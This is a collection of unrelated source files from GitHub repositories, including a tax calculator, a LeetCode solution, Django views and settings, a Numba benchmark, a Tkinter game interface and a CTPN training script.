elif (45001 <= chargeableincome2 <= 90000):
tax2 = (chargeableincome2 - 45000) * 0.07 + tax[0]
payTax2 = tax2 - min(tax2 * 0.75,20000)
elif (90001 <= chargeableincome2 <= 135000):
tax2 = (chargeableincome2 - 45000 * 2) * 0.12 + tax[0] + tax[1]
payTax2 = tax2 - min(tax2 * 0.75,20000)
elif (135001 <= chargeableincome2):
tax2 = (chargeableincome2 - 45000 * 3) * 0.17 + tax[0]+ tax[1] + tax[2]
payTax2 = tax2 - min(tax2 * 0.75,20000)
else:
payTax2 = 0
return payTax1 + payTax2
def marriedCouple(income1,income2):
#print("Start Married")
MPF1 = min(income1 * 0.05,15000)
MPF2 = min(income2 * 0.05,15000)
chargeableincome = (income1 - MPF1) + (income2 - MPF2)
if chargeableincome <= 264000:
income_tax = 0
return income_tax
elif chargeableincome >= 264000:
if chargeableincome in range(264001,309000):
tax1 = 0
tax2 = 0.02 * (chargeableincome - 264000)
income_tax = tax1 + tax2
income_tax = income_tax - (income_tax * 0.75)
return income_tax
elif chargeableincome in range(309001,354000):
tax1 = 0
tax2 = 900
tax3 = 0.07 * (chargeableincome - 264000 - 45000)
income_tax = tax1 + tax2 + tax3
income_tax = income_tax - (income_tax * 0.75)
return income_tax
elif chargeableincome in range(354001,399000):
tax1 = 0
tax2 = 900
tax3 = 3150
tax4 = 0.12 * (chargeableincome - 264000 - 90000)
income_tax = tax1 + tax2 + tax3 + tax4
income_tax = income_tax - (income_tax * 0.75)
return income_tax
elif chargeableincome >= 399000:
tax1 = 0
tax2 = 900
tax3 = 3150
tax4 = 5400
tax5 = 0.17 * (chargeableincome - 264000 - 135000)
income_tax = tax1 + tax2 + tax3 + tax4 + tax5
income_tax = income_tax - (min(income_tax * 0.75,20000))
return income_tax
#call main function
def main(income1,income2):
print("Single tax = ", format(singleTaxCal(income1,income2),"7.2f"))
print("Couple tax = ", format(marriedCouple(income1,income2),"7.2f"))
if (singleTaxCal(income1,income2) > marriedCouple(income1,income2)):
print("Choose Married Tax")
return "Choose Married Tax"
elif (singleTaxCal(income1,income2) < marriedCouple(income1,income2)):
print("Choose single tax")
return "Choose single tax"
else:
print("There are no different")
return "There are no different"
#main function
main(income1,income2)
| [
"noreply@github.com"
] | noreply@github.com |
536610ba716a9b8715ef45dffd40ac555213c201 | 1dcea2a511f14a43701994f6a7785afd21a20d74 | /Algorithm/61_RotateList.py | ad33302d777bb10f3daee4eb21b7a5bd9a4a46c7 | [] | no_license | lingtianwan/Leetcode2 | 66031e256a2928c6197516f83f14748c52e91b8c | 80a604cc09d5d2d62dd05157d8b829de675e4404 | refs/heads/master | 2021-01-13T11:17:18.238465 | 2017-02-09T01:43:38 | 2017-02-09T01:43:38 | 81,395,927 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 956 | py | # Given a list, rotate the list to the right by k places, where k is non-negative.
#
# For example:
# Given 1->2->3->4->5->NULL and k = 2,
# return 4->5->1->2->3->NULL.
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
def rotateRight(self, head, k):
"""
:type head: ListNode
:type k: int
:rtype: ListNode
"""
if not head:
return None
fast = head
cnt = 0
while fast:
fast = fast.next
cnt += 1
k %= cnt
if k == 0:
return head
fast = head
slow = head
for _ in range(k):
fast = fast.next
while fast.next:
fast = fast.next
slow = slow.next
res = slow.next
slow.next = None
fast.next = head
return res
| [
"lingtian.wan@gmail.com"
] | lingtian.wan@gmail.com |
8c5369e862b8187fd0b71dc8f0f2dfa62994244e | f9994f66f21f8bbdfd6502b04fd76534a3a3fa62 | /firstpython.py | c663eda1ce15b330c06a4c9f87190d9a5de781a3 | [] | no_license | rishika910/silver-journey | 4681643555e5a5867b58e27ea63426de9c28a8dd | 6125396016a799fac0d0de855f46531e32702fba | refs/heads/main | 2023-07-10T19:12:05.125535 | 2021-08-21T17:36:30 | 2021-08-21T17:36:30 | 398,619,695 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 37 | py | # Display output
print("A new file")
| [
"noreply@github.com"
] | noreply@github.com |
1f68ff02a3784d7f3d9469d7701cb42603a1e5dc | a5b3a2e2dc7066ed2ae035bdfb595f1971c550aa | /上课练习2/day8-socket-server/多线程/线程锁—互斥锁Mutex.py | 8551c8a31df7943c2dba9ddfecdd4bc2e12d1549 | [] | no_license | jiaziming/oldboy | bed26a0ea22c80600bbcae61da82055577b2a61a | 746b24a500809a8bce71922a496532ec69de93e5 | refs/heads/master | 2021-01-23T01:33:53.946410 | 2017-07-28T03:27:05 | 2017-07-28T03:27:05 | 86,789,623 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 546 | py | #!/usr/bin/env python
#-*-conding:utf-8-*-
import threading,time
def addNUM():
global num #在每个线程都获取这个全局变量
print('--get num:',num)
time.sleep(1)
lock.acquire()
num -= 1 #对公共变量进行-1操作
lock.release()
lock =threading.Lock()
num = 100 #设置一个公共变量
thread_list = []
for i in range(100):
t = threading.Thread(target=addNUM)
t.start()
thread_list.append(t)
for i in thread_list: #等待所有线程直线完毕
t.join()
print('final num:',num) | [
"jiaziming123@sina.cn"
] | jiaziming123@sina.cn |
0ea731807079336c5edf2453e90cb32ecfc823f9 | 135238dfa1bdd3a577c6b08ebcd478a649c0dce3 | /cfgov/retirement_api/views.py | c3c345a078d858dd6b4b6b3fae311728ad76cb07 | [
"CC0-1.0"
] | permissive | adebisi-aden/consumerfinance.gov | 5e716a03180ba18bac747e5f3e7e47c7774c2dab | 8c0f5afac341823c59f73b0c6bd60592e0f5eaca | refs/heads/main | 2023-08-12T04:13:43.687689 | 2021-09-17T14:24:54 | 2021-09-17T14:24:54 | 407,607,316 | 0 | 0 | CC0-1.0 | 2021-09-17T16:21:12 | 2021-09-17T16:21:11 | null | UTF-8 | Python | false | false | 2,445 | py | import json
import os
from django.http import HttpResponse, HttpResponseBadRequest
from dateutil import parser
from .utils.ss_calculator import get_retire_data
from .utils.ss_utilities import get_retirement_age
BASEDIR = os.path.dirname(__file__)
def param_check(request, param):
if param in request.GET and request.GET[param]:
return request.GET[param]
else:
return None
def income_check(param):
cleaned = param.replace("$", "").replace(",", "").partition(".")[0]
try:
clean_income = int(cleaned)
except ValueError:
return None
else:
return clean_income
def estimator(request, dob=None, income=None, language="en"):
ssa_params = {
"dobmon": 0,
"dobday": 0,
"yob": 0,
"earnings": 0,
"lastYearEarn": "", # not using
"lastEarn": "", # not using
"retiremonth": "", # only using for past-FRA users
"retireyear": "", # only using for past-FRA users
"dollars": 1, # benefits to be calculated in current-year dollars
"prgf": 2,
}
if dob is None:
dob = param_check(request, "dob")
if not dob:
return HttpResponseBadRequest("invalid date of birth")
if income is None:
income_raw = param_check(request, "income")
if not income_raw:
return HttpResponseBadRequest("invalid income")
else:
income = income_check(income_raw)
if income is None:
return HttpResponseBadRequest("invalid income")
else:
income = income_check(income)
if income is None:
return HttpResponseBadRequest("invalid income")
try:
dob_parsed = parser.parse(dob)
except ValueError:
return HttpResponseBadRequest("invalid date of birth")
else:
DOB = dob_parsed.date()
ssa_params["dobmon"] = DOB.month
ssa_params["dobday"] = DOB.day
ssa_params["yob"] = DOB.year
ssa_params["earnings"] = income
data = get_retire_data(ssa_params, language)
return HttpResponse(json.dumps(data), content_type="application/json")
def get_full_retirement_age(request, birth_year):
data_tuple = get_retirement_age(birth_year)
if not data_tuple:
return HttpResponseBadRequest("bad birth year (%s)" % birth_year)
else:
data = json.dumps(data_tuple)
return HttpResponse(data, content_type="application/json")
| [
"noreply@github.com"
] | noreply@github.com |
cc6b83a6ac136bf167c42cf0929469a23be292e0 | 57af0aa503918f5586696271856ddf10685a106a | /code/inductive/dataset.py | 4a9c4446b6ac4a4715d7b9d90c12fb2d5d1b8495 | [] | no_license | Linkerbrain/GNN-document-classification | 2a5e7dd527dc1f0694e1e12cd125f2144f4aa1f2 | 7e19408f75510685fc4fa13507532d161460ec7e | refs/heads/main | 2023-04-23T09:20:26.741356 | 2021-05-04T11:33:10 | 2021-05-04T11:33:10 | 357,503,385 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,632 | py | import torch
import random
import numpy as np
from torch_geometric.data import Data
from torch_geometric.data import DataLoader
from tqdm import tqdm
class InductiveDataset():
def __init__(self, graphs, labels, word_vocab, label_vocab):
# vocabs for later
self.word_vocab = word_vocab
self.label_vocab = label_vocab
# debug stats
self.word_total = 0
self.word_fails = 0
self.label_total = 0
self.label_fails = 0
# The Data
self.graphs = self.create_dataobjects(graphs, labels)
# facts
self.vocab_size = len(self.word_vocab)
self.label_count = len(self.label_vocab)
# print debug stats
tag = "[dataprep] "
succes = "Succesfully embedded %d/%d words, %d/%d labels." % (self.word_total-self.word_fails, self.word_total, self.label_total-self.label_fails, self.label_total)
total_graphs = len(self.graphs)
ave_length = sum([graph.num_nodes for graph in self.graphs]) / total_graphs
max_length = max([graph.num_nodes for graph in self.graphs])
summary = "Dataset contains %d graphs, averaging %d nodes, with a maximum of %d" % (total_graphs, ave_length, max_length)
print("[dataprep]" + succes + "\n" + tag + summary)
def get_nodes_idx(self, nodes):
"""returns the corresponding indexes of words, requires ___UNK___ token in vocab"""
idxs = []
for node in nodes:
self.word_total += 1
if node in self.word_vocab:
idxs.append(self.word_vocab[node])
else:
self.word_fails += 1
idxs.append(self.word_vocab["___UNK___"])
return torch.tensor(idxs, dtype=torch.long)
def get_label_idx(self, label):
"""returns the corresponding index of label, unknown labels get added to first label"""
self.label_total += 1
if label in self.label_vocab:
return torch.tensor([self.label_vocab[label]], dtype=torch.long)
else:
self.label_fails += 1
return torch.tensor([0], dtype=torch.long)
def create_dataobjects(self, graphs, labels):
"""
Create PyTorch Geometric Data objects from the raw graphs
"""
processed_graphs = []
print("[dataprep] Making Data objects")
for graph, label in zip(graphs, labels):
((edge_indices, edge_weights), nodes) = graph
nodes_idx = self.get_nodes_idx(nodes)
label_idx = self.get_label_idx(label)
torch_edges = torch.tensor(edge_indices, dtype=torch.long)
torch_edge_weights = torch.tensor(edge_weights, dtype=torch.float)
graph = Data(x=nodes_idx, edge_index=torch_edges, edge_attr=torch_edge_weights, y=label_idx)
graph.num_nodes = len(nodes_idx)
processed_graphs.append(graph)
return processed_graphs
def to_dataloader(self, batch_size, shuffle=True, test_size=None):
"""
Makes a PyTorch Geometric Dataloader that can be used to retrieve batches
"""
# make a train and test dataloader if test_size is provided
if test_size:
random.shuffle(self.graphs)
split_n = int(len(self.graphs) * (1-test_size))
return DataLoader(self.graphs[:split_n], batch_size, shuffle), DataLoader(self.graphs[split_n:], batch_size, shuffle)
return DataLoader(self.graphs, batch_size, shuffle)
def __getitem__(self, index):
return self.graphs[index]
def __len__(self):
return len(self.graphs) | [
"lloerakker@gmail.com"
] | lloerakker@gmail.com |
01f689e9ef9e799a2321e60a33ab66011923ddfa | 06f5ed6cec8ae105eb4f47ce87edae7080e1f8a8 | /chirper/settings.py | 532bb3cfa617d0224e85c3e930678260ed80d9a4 | [] | no_license | terenced/chirper | 6a8a9e0923e73e161e7870df08dda08ada2d90b9 | 041036427ca990ccf3f718d37fb6cf27f7f335b2 | refs/heads/master | 2020-04-06T05:24:06.225035 | 2013-10-22T20:44:56 | 2013-10-22T20:44:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,836 | py | # Django settings for chirper project.
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', 'your_email@example.com'),
)
AUTH_PROFILE_MODULE = "chirper_api.UserProfile"
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'chirper.db', # Or path to database file if using sqlite3.
# The following settings are not used with sqlite3:
'USER': '',
'PASSWORD': '',
'HOST': '', # Empty for localhost through domain sockets or '127.0.0.1' for localhost through TCP.
'PORT': '', # Set to empty string for default.
}
}
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/var/www/example.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://example.com/media/", "http://media.example.com/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/var/www/example.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://example.com/static/", "http://static.example.com/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'zzi40y8^oqp3+xb%db=4vrapzru%rs2^m7-ny-z=#!^506dv(^'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'chirper.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'chirper.wsgi.application'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django_extensions',
'rest_framework',
'rest_framework.authtoken',
'chirper_api',
'chirper_web'
# Uncomment the next line to enable the admin:
# 'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
)
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer'
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.TokenAuthentication',
),
'DEFAULT_PERMISSION_CLASSES': (
'rest_framework.permissions.IsAuthenticated',
)
} | [
"terry.dellino@gmail.com"
] | terry.dellino@gmail.com |
b01bf0b6ca13eb712951accf540807cec349afc4 | c18a363f25565fe61221dba7987d461d698bc3bb | /testNumba/test_officalWeb_2.py | ac0a0cc70b6493bc463bf5c091914afdab4ae875 | [] | no_license | ijiangpeiyong/ijiang | a1e689707bfcefc29170ae8c85067a76c18a0829 | 66a4da5d38d954a400fe7bf9def796f2bf6bdb6e | refs/heads/master | 2020-04-10T16:05:32.341278 | 2019-01-03T10:45:58 | 2019-01-03T10:45:58 | 161,132,860 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,183 | py | from numba import jit
import random
import time
def monte_carlo_pi(nsamples):
acc=0
for i in range(nsamples):
x=random.random()
y=random.random()
if (x**2+y**2)<1.0:
acc+=1
return 4.0*acc/nsamples
@jit()
def jit_monte_carlo_pi(nsamples):
acc=0
for i in range(nsamples):
x=random.random()
y=random.random()
if (x**2+y**2)<1.0:
acc+=1
return 4.0*acc/nsamples
@jit(nopython=True)
def nopython_monte_carlo_pi(nsamples):
acc=0
for i in range(nsamples):
x=random.random()
y=random.random()
if (x**2+y**2)<1.0:
acc+=1
return 4.0*acc/nsamples
@jit(nogil=True)
def nogil_monte_carlo_pi(nsamples):
acc=0
for i in range(nsamples):
x=random.random()
y=random.random()
if (x**2+y**2)<1.0:
acc+=1
return 4.0*acc/nsamples
@jit(nogil=True,nopython=True)
def nogil_nopython_monte_carlo_pi(nsamples):
acc=0
for i in range(nsamples):
x=random.random()
y=random.random()
if (x**2+y**2)<1.0:
acc+=1
return 4.0*acc/nsamples
if __name__ == "__main__":
nsamples=int(1e5)
tic=time.time()
monte_carlo_pi(nsamples)
toc=time.time()
print('nb ',toc-tic)
jit_monte_carlo_pi(nsamples)
tic_jit_monte_carlo_pi=time.time()
jit_monte_carlo_pi(nsamples)
toc_jit_monte_carlo_pi=time.time()
print('nb ',toc_jit_monte_carlo_pi-tic_jit_monte_carlo_pi)
nopython_monte_carlo_pi(nsamples)
tic_nopython_monte_carlo_pi=time.time()
nopython_monte_carlo_pi(nsamples)
toc_nopython_monte_carlo_pi=time.time()
print('nb ',toc_nopython_monte_carlo_pi-tic_nopython_monte_carlo_pi)
nogil_monte_carlo_pi(nsamples)
ticNogil=time.time()
nogil_monte_carlo_pi(nsamples)
tocNogil=time.time()
print('nb ',tocNogil-ticNogil)
nogil_nopython_monte_carlo_pi(nsamples)
tic_nogil_nopython_monte_carlo_pi=time.time()
nogil_nopython_monte_carlo_pi(nsamples)
toc_nogil_nopython_monte_carlo_pi=time.time()
print('nb ',toc_nogil_nopython_monte_carlo_pi-tic_nogil_nopython_monte_carlo_pi)
| [
"ijiangpeiyong@126.com"
] | ijiangpeiyong@126.com |
66b63ca00a999d2611f9e8483abd97da52d70e28 | 91e8200c790ef77a3f5401def4bbaea408e2cf6c | /Func_tuts/pFa.py | c12818a15b3ac27832cff15fbb32316940072ba0 | [] | no_license | mikel-codes/python_scripts | e3795629c5096d20c41fe3a13714e1519b59c1be | cf1a475c843c8e8e857229fbd3dc52525765f185 | refs/heads/main | 2023-06-23T07:02:59.385491 | 2021-07-24T08:12:49 | 2021-07-24T08:12:49 | 389,036,577 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 840 | py | from functools import partial #these tools help for customization of function
from operator import add, mul
import Tkinter
addQ = partial(add, 10)
mul100 = partial(mul, 100)
print addQ(20)
print mul100(18)
baseTwo = partial(int, base=2)
baseTwo.__doc__ = "converts to base 10 a binary"
print baseTwo('10001')
root = Tkinter.Tk()
Button = partial(Tkinter.Button, root, fg = "red", bg = "blue")
b1 = Button(text="Button 1", fg = "green")
b2 = Button(text= "Button 2", fg = "brown")
qb = Button(text= "QUIT", command= root.quit)
b1.pack()
b2.pack()
qb.pack(expand=True, fill=Tkinter.X)
root.title("Fun with PFA's")
root.mainloop()
bar = 1
def Foo():
print "calling Foo() in __main__"
global bar
bar = 100
print "Note any changes after"
print "value of bar before Foo ", bar
Foo()
print "value of bar after Foo()", bar
| [
"gatez@yahoo.com"
] | gatez@yahoo.com |
59578622e0748a2eea98e10fbb3842e3303d2f6d | aea6e23c484ba615fb7e36752b36f9b018c60ae5 | /Predictor/predictor_helper.py | 6b78585abfb9e4ca1776fee0185d5053633158bf | [] | no_license | Hylian/Hashtagger | d7151796ff4d88fa675911442a4a15434e27d940 | 1322c321b3650f3cd3c6cab591cb0c70bb8ec8a5 | refs/heads/master | 2021-01-01T05:34:52.686700 | 2013-09-15T05:11:39 | 2013-09-15T05:11:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,825 | py | import numpy, pickle
from predictor import predictor_func
NUM_FILES = 100
freq = dict ()
words = []
examples = []
cur_example = 0
num_train = 1000
num_test = 1000
score = 0.0
#utilities
def checkChar (c):
return 0 <= ord (c) and ord(c) < 128
def clean (word):
ret = filter (checkChar, word)
ret = ret.encode ("ascii", "ignore")
return ret
def is_url (word):
if word [0:4] == "http":
return True
return False
#input
def read_in (file_addr):
data = pickle.load (open (file_addr, 'rb'))
words = []
global hdict
for pair in data:
text = pair [0]
hashtags = pair [1]
clean_text = []
clean_hashtags = []
for hashtag in hashtags:
clean_hashtags.append (clean (hashtag))
for word in text:
if is_url (word):
continue
clean_text.append (clean (word))
examples.append ([clean_text, clean_hashtags])
def get_all_data ():
for i in range (NUM_FILES):
read_in ('../scraper/tweets' + str (i))
read_in ('../csvconvert/yolotweets.csv.pickle')
#read_in ('../csvconvert/iphonetweets.csv.pickle')
#read_in ('../csvconvert/educationtweets.csv.pickle')
#read_in ('../csvconvert/newstweets.csv.pickle')
read_in ('../csvconvert/syriatweets.csv.pickle')
#read_in ('../csvconvert/economytweets.csv.pickle')
def get_example ():
if (cur_example >= num_train):
return False
ex = examples [cur_example]
cur_example += 1
return ex
def run_tests ():
ex = examples [cur_example]
distrib = predictor_func (ex [0])
cur_score = 0
for hashtag in distrib:
if hashtag not in ex [1]:
cur_score += log (1 - distrib [hashtag])
for hashtag in ex [1]:
if hashtag in distrib:
cur_score += log (distrib [hashtag])
else:
cur_score += -1000
score += cur_score
cur_example += 1
get_all_data ()
| [
"rayli@Rays-MacBook-Air.local"
] | rayli@Rays-MacBook-Air.local |
2b9247f47cc8da5fb98b47c63dc13949cd8cd7e3 | 721459bf299f74db4983916e76bd756f4e338cf8 | /ctpn/main/train.py | e48534c93bf5dd03c2ea497191fec1a9568d4781 | [] | no_license | JACK1416/OCR | a9c515230781790b0d7149851b51d4772285db33 | a839f53158df8c63aa10ca269feabb5db556532f | refs/heads/master | 2020-04-26T08:44:48.554812 | 2019-03-02T10:35:47 | 2019-03-02T10:35:47 | 173,433,041 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,930 | py | # -*- coding: utf-8 -*-
import os
import sys
import time
import datetime
sys.path.append('..')
import tensorflow as tf
import numpy as np
import cv2 as cv
from nets.ctpn import ctpn
from nets.data_layer import DataLayer
from utils.loss import loss
tf.app.flags.DEFINE_float('learning_rate', 1e-5, '')
tf.app.flags.DEFINE_integer('max_steps', 500, '')
tf.app.flags.DEFINE_integer('decay_steps', 30000, '')
tf.app.flags.DEFINE_float('decay_rate', 0.1, '')
tf.app.flags.DEFINE_float('moving_average_decay', 0.997, '')
tf.app.flags.DEFINE_integer('num_readers', 4, '')
tf.app.flags.DEFINE_string('checkpoint_path', 'checkpoints_mlt/', '')
tf.app.flags.DEFINE_string('logs_path', 'logs_mlt/', '')
tf.app.flags.DEFINE_string('pretrained_model_path', None, '')
tf.app.flags.DEFINE_boolean('restore', False, '')
tf.app.flags.DEFINE_integer('save_checkpoint_steps', 500, '')
FLAGS = tf.app.flags.FLAGS
def main(self):
now = datetime.datetime.now()
format_time = now.strftime('%Y-%m-%d-%H-%M-%S')
os.makedirs(FLAGS.logs_path + format_time)
if not os.path.exists(FLAGS.checkpoint_path):
os.makedirs(FLAGS.checkpoint_path)
image = tf.placeholder(tf.float32, shape=[None, None, None, 3], name='image')
bbox = tf.placeholder(tf.float32, shape=[None, 5], name='bbox')
im_info = tf.placeholder(tf.float32, shape=[3], name='im_info')
global_step = tf.get_variable('global_step', [], initializer=tf.constant_initializer(0), trainable=False)
learning_rate = tf.Variable(FLAGS.learning_rate, trainable=False)
opt = tf.train.AdamOptimizer(learning_rate)
with tf.name_scope('ctpn') as scope:
bbox_pred, cls_pred = ctpn(image)
total_loss, model_loss, rpn_cross_entropy, rpn_loss_box = \
loss(bbox_pred, cls_pred, bbox, im_info)
batch_norm_updates_op = tf.group(*tf.get_collection(tf.GraphKeys.UPDATE_OPS, scope))
grads = opt.compute_gradients(total_loss)
apply_gradient_op = opt.apply_gradients(grads, global_step=global_step)
summary_op = tf.summary.merge_all()
variable_averages = tf.train.ExponentialMovingAverage(
FLAGS.moving_average_decay, global_step)
variables_averages_op = variable_averages.apply(tf.trainable_variables())
with tf.control_dependencies([variables_averages_op, apply_gradient_op, batch_norm_updates_op]):
train_op = tf.no_op(name='train_op')
saver = tf.train.Saver(tf.global_variables(), max_to_keep=100)
summary_writer = tf.summary.FileWriter(FLAGS.logs_path + format_time, tf.get_default_graph())
init = tf.global_variables_initializer()
if FLAGS.pretrained_model_path is not None:
variable_restore_op = slim.assign_from_checkpoint_fn(FLAGS.pretrained_model_path,
slim.get_trainable_variables(),
ignore_missing_vars=True)
config = tf.ConfigProto()
config.allow_soft_placement = True
with tf.Session(config=config) as sess:
if FLAGS.restore:
ckpt = tf.train.latest_checkpoint(FLAGS.checkpoint_path)
restore_step = int(ckpt.split('.')[0].split('_')[-1])
print("continue training from previous checkpoint {}".format(restore_step))
saver.restore(sess, ckpt)
else:
sess.run(init)
restore_step = 0
if FLAGS.pretrained_model_path is not None:
variable_restore_op(sess)
data_layer = DataLayer('../../data/mlt/')
data_generator = data_layer.generator()
start = time.time()
for step in range(restore_step, FLAGS.max_steps):
data = next(data_generator)
ml, tl, _, summary_str = sess.run([model_loss, total_loss, train_op, summary_op],
feed_dict={image: data[0],
bbox: data[1],
im_info: data[2]})
summary_writer.add_summary(summary_str, global_step=step)
if step != 0 and step % FLAGS.decay_steps == 0:
sess.run(tf.assign(learning_rate, learning_rate.eval() * FLAGS.decay_rate))
if step % 10 == 0:
avg_time_per_step = (time.time() - start) / 10
start = time.time()
print('Step {:06d}, model loss {:.4f}, total loss {:.4f}, {:.2f} seconds/step, LR: {:.6f}'.format(
step, ml, tl, avg_time_per_step, learning_rate.eval()))
if (step + 1) % FLAGS.save_checkpoint_steps == 0:
filename = ('ctpn_{:d}'.format(step + 1) + '.ckpt')
filename = os.path.join(FLAGS.checkpoint_path, filename)
saver.save(sess, filename)
print('Write model to: {:s}'.format(filename))
if __name__ == '__main__':
tf.app.run()
| [
"apple@Macbook.local"
] | apple@Macbook.local |
8be890fee96f1b20a72ee0e5a12994463dacff69 | 77df49e20d8f2e95a349758c92c7cef7afaddb80 | /gameinterface.py | e4fdc718c0b338c1a15f2ad944bf1584c0b98333 | [] | no_license | LarsLKarlsson68/Italian-Dungeons | 7b32b7623e71822fc4f412b93a972455bdf9b1a9 | 0bef22d97d4774b4f5bef4489e17b0833cede4cd | refs/heads/master | 2021-01-15T16:10:12.014995 | 2017-08-08T15:54:32 | 2017-08-08T15:54:32 | 99,709,382 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,286 | py | # -*- coding: latin_1 -*-
import tkinter
import _thread
import tkinter.filedialog
#import Image
#import ImageTk
class GameInterface(tkinter.Frame):
def __init__(self,xsize=10,ysize=10,tilesize=10):
print("Entering GameInterface.init")
tkinter.Frame.__init__(self,None)
self.canvas = tkinter.Canvas(self,width=xsize*tilesize,height=xsize*tilesize,bg='black')
self.canvas.pack(expand=1,anchor=tkinter.CENTER,side=tkinter.LEFT)
self.text = tkinter.Text(self,width=60,height=24,font="Times 14",wrap=tkinter.WORD)
self.text.pack()
self.input = tkinter.Entry(self,width=53,font="Times 14 bold")
self.input.pack()
self.input.bind('<Return>', self._has_input)
self.pack()
self.xsize=xsize
self.ysize=ysize
self.tilesize=tilesize
self.xoffset = 0
self.yoffset = 0
self.input_lock = _thread.allocate_lock()
self.mutex = _thread.allocate_lock()
self.input_lock.acquire()
self.update_queue = []
self.updates_ready_flag = False
self.text_entered = ''
self.update_map_and_text()
self.text.tag_config("<bf>",font="Times 14 bold")
self.text.tag_config("<it>",font="Times 14 italic")
self.text.tag_config("<rm>",font="Times 14")
self.tag_list = ["<bf>","<it>","<rm>"]
self.image_repository = dict()
print("Exiting GameInterface.init")
self.tkraise()
def add_update(self,update):
self.mutex.acquire()
self.update_queue += [update]
self.mutex.release()
def updates_ready(self):
self.mutex.acquire()
self.updates_ready_flag = True
self.mutex.release()
def update_map_and_text(self):
self.mutex.acquire()
if self.updates_ready_flag:
for u in self.update_queue:
if u[0] == 'clear':
self.clear_map_foreground()
elif u[0] == 'center':
self.center_map(u[1],u[2])
elif u[0] in ('foreground','background'):
self.add_to_map(u[1],u[2],u[3],u[0])
elif u[0] == 'text':
self.text.insert(tkinter.END,u[1],u[2])
self.text.see(tkinter.END)
elif u[0] == 'textimage':
image = self.get_image(u[1])
self.text.image_create(tkinter.END,image=image)
self.text.see(tkinter.END)
elif u[0] == 'newmap':
self.new_map(u[1])
elif u[0] == 'quit':
print('Bye!')
self.destroy()
elif u[0] == 'savefile':
self.text_entered = tkinter.filedialog.asksaveasfilename(parent=self,initialdir="./saved",title='Please provide a file to save in')
self.input_lock.release()
elif u[0] == 'loadfile':
self.text_entered = tkinter.filedialog.askopenfilename(parent=self,initialdir="./saved",title='Please select a file to load')
self.input_lock.release()
self.update_queue = []
self.updates_ready_flag = False
self.mutex.release()
self.after(100,self.update_map_and_text)
def add_to_map(self,image,xpos,ypos,tag):
